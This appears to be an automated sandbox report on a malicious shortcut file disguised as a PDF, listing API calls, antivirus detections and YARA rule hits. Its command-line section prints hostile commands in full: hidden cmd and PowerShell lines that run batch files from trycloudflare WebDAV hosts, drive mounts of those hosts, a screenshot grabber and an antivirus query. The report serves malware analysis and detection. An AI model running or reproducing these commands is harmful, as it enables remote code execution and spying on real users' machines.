NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0212a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02104000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0213b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02137000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02122000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02135000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02105000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0212c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ca0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02106000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0213c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02123000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02124000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02125000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02126000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02127000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02128000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02129000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e45000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e46000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e47000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e48000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e49000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e4f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2812
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e51000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 9115271168
free_bytes_available: 9115271168
root_path: U:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Temp\doc01585520250114102531.pdf.lnk
file C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
cmdline C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
cmdline "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
cmdline powershell -Command "Add-Type -AssemblyName System.Windows.Forms,System.Drawing; $screen = [System.Windows.Forms.Screen]::AllScreens[0]; $bitmap = New-Object Drawing.Bitmap $screen.Bounds.Width, $screen.Bounds.Height; $graphics = [System.Drawing.Graphics]::FromImage($bitmap); $graphics.CopyFromScreen($screen.Bounds.Location, [System.Drawing.Point]::Empty, $screen.Bounds.Size); $bitmap.Save('C:\Users\test22\AppData\Local\Temp\test22-PC_screenshot.png', [System.Drawing.Imaging.ImageFormat]::Png);"
cmdline powershell -Command "Expand-Archive -Path 'C:\Users\test22\Contacts\zone.zip' -DestinationPath 'C:\Users\test22\Contacts' -Force"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName" 2>nul
cmdline powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
cmdline C:\Windows\system32\cmd.exe /c powershell -Command "[System.Net.Dns]::GetHostName()"
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
cmdline "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Select-Object -ExpandProperty displayName"
cmdline C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
cmdline C:\Windows\system32\cmd.exe /K \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
filepath: cmd
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: cmd
parameters: /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
filepath: cmd
1 1 0

CreateProcessInternalW

 thread_identifier: 2808
thread_handle: 0x00000084
process_identifier: 2812
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

 thread_identifier: 1368
thread_handle: 0x00000088
process_identifier: 1376
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/k \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0

CreateProcessInternalW

 thread_identifier: 1324
thread_handle: 0x00000088
process_identifier: 756
current_directory: C:\Windows
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat\" hidden' -WindowStyle Hidden"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: C:\Windows\system32\cmd.exe
parameters: /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
filepath: C:\Windows\System32\cmd.exe
1 1 0
ESET-NOD32 a variant of Generik.LKBOMJW
Kaspersky HEUR:Trojan-Downloader.WinLNK.Agent.gen
huorong TrojanDownloader/LNK.Agent.en
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x054c0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
cmdline net use W: "\\characters-contrary-foster-workout.trycloudflare.com@SSL\DavWWWRoot"
cmdline net use U: /delete /yes
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline net use U: "\\divide-snow-pound-clip.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no
cmdline "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2128 CREDAT:145409
file C:\Windows\%oI¼╢e:~27,1%oI¼╢e:~61,1%oI¼╢e:~29,1oI¼╢e:~0,1%oI¼╢e:~10,1%oI¼╢e:~27,1%oI¼╢e:~21,1%
count 1036 name heapspray process powershell.exe total_mb 64 length 65536 protection PAGE_READWRITE
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /k "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat" hidden
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
parent_process wscript.exe martian_process cmd /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c start /min \\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\rx.bat
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\final.bat" hidden
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
parent_process powershell.exe martian_process C:\Windows\System32\cmd.exe /c "\\achievements-plates-station-gaming.trycloudflare.com@SSL\DavWWWRoot\tra.bat" hidden
Process injection Process 3048 resumed a thread in remote process 1688
Process injection Process 1844 resumed a thread in remote process 1560
Process injection Process 2820 resumed a thread in remote process 2912
Process injection Process 2128 resumed a thread in remote process 2856
Process injection Process 2120 resumed a thread in remote process 2288
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000064c
suspend_count: 1
process_identifier: 1688
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1560
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2912
1 0 0

NtResumeThread

 thread_handle: 0x00000334
suspend_count: 1
process_identifier: 2856
1 0 0

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2288
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\SysWOW64\wscript.exe
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe